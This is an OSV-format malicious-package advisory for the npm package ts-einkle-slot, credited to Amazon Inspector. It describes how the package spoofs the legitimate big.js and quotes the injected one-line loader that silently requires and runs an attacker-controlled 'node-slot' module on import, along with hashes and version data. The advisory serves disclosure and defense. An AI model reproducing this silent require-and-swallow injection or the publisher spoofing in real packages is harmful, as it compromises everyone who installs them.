{"id":"MAL-2026-6525","summary":"Malicious code in ts-einkle-slot (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)\nPackage is published as `ts-einkle-slot` but its tarball contents (source, README, LICENCE, package.json author/repository/description) are copied verbatim from Michael Mclaughlin's legitimate `big.js` package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (`big.js` and `big.mjs`, referenced from `main`/`module`/`exports`) contain an injected top-level block: `try { const doc = require('node-slot'); doc.from_str().then(e =\u003e {}).catch(e =\u003e {}) } catch (error) {}`. This causes the transitive dependency `node-slot` (pulled in via the declared `ts-einkle` dependency) to be loaded and its `from_str()` invoked the moment any consumer `require`s or `import`s this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated `node-slot` runtime module on import. Installer harm is delivered by the attacker-controlled transitive `node-slot`, which is pulled into the install tree solely by virtue of installing this package.\n","modified":"2026-06-27T19:46:39.237574074Z","published":"2026-06-26T14:15:58Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-007605","source":"amazon-inspector","sha256":"f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b","versions":["0.0.8"],"modified_time":"2026-06-26T14:15:58Z","import_time":"2026-06-26T14:59:21.307992564Z"},{"id":"IN-MAL-2026-007683","modified_time":"2026-06-27T15:46:43Z","sha256":"410ddc78002637af895c433fbefd95d70bfaa2b35f761e51bf4ea77e1a0aec65","import_time":"2026-06-27T15:57:49.062065643Z","source":"amazon-inspector","versions":["0.1.0"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007682","source":"amazon-inspector","sha256":"ebcd03f4867c803e5fe72f1bd4005bd51a3b441ba6bbc8ebec1a72af5dfa083e","versions":["0.0.9"],"modified_time":"2026-06-27T15:46:35Z","import_time":"2026-06-27T15:57:48.996183141Z","ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007687","import_time":"2026-06-27T19:35:56.0374892Z","sha256":"5811ddfd53f327bf98d44c5903c7ddb009a05689cd172688e5bd5cbbaaf62eb2","source":"amazon-inspector","modified_time":"2026-06-27T19:13:34Z","versions":["0.1.1"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007686","import_time":"2026-06-27T19:35:55.909734348Z","sha256":"90d45cca3c7e05f5c9af46b98cec23a8d0971fdb9c83c5f120d0ca4767bda0b9","source":"amazon-inspector","modified_time":"2026-06-27T19:13:22Z","versions":["0.1.2"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.0.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.0.9"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.2"}],"affected":[{"package":{"name":"ts-einkle-slot","ecosystem":"npm","purl":"pkg:npm/ts-einkle-slot"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["0.0.8","0.1.0","0.0.9","0.1.1","0.1.2"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-einkle-slot/MAL-2026-6525.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."},{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"sha256":"442c54a9b0beff03159cb7dd3a59ad1c09dbe09f0bcec91df0a33a032a2e4f99","tlsh":"c6c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc","path":"big.js"},{"sha256":"37d3f81086dd78148676abfcd8858197a146ff8d91f1ca2d10f62159a32640d2","tlsh":"5ec2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc","path":"big.mjs"},{"sha256":"74c66314db3fc39413c66b3abd50304d7969e1715c6dfabf799ab0fe938e62e0","tlsh":"ea210463c9e19da70af85ba47cac43a9f1161b1f40a04c5bb07b131c5f3345b2095b7d","path":"package.json"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-Nc2yiowLUS+K5fgbw5I+243QO2DPvOmwWUM6isWsw1+x30muc1zP5mAWS+aKFJfEP+uhzXGb3kMwQF+thUU+xQ==","sha1":"a6e7d2ef2de53501dea40b179e73a4af7d1df286"},"filename":"ts-einkle-slot-0.0.8.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}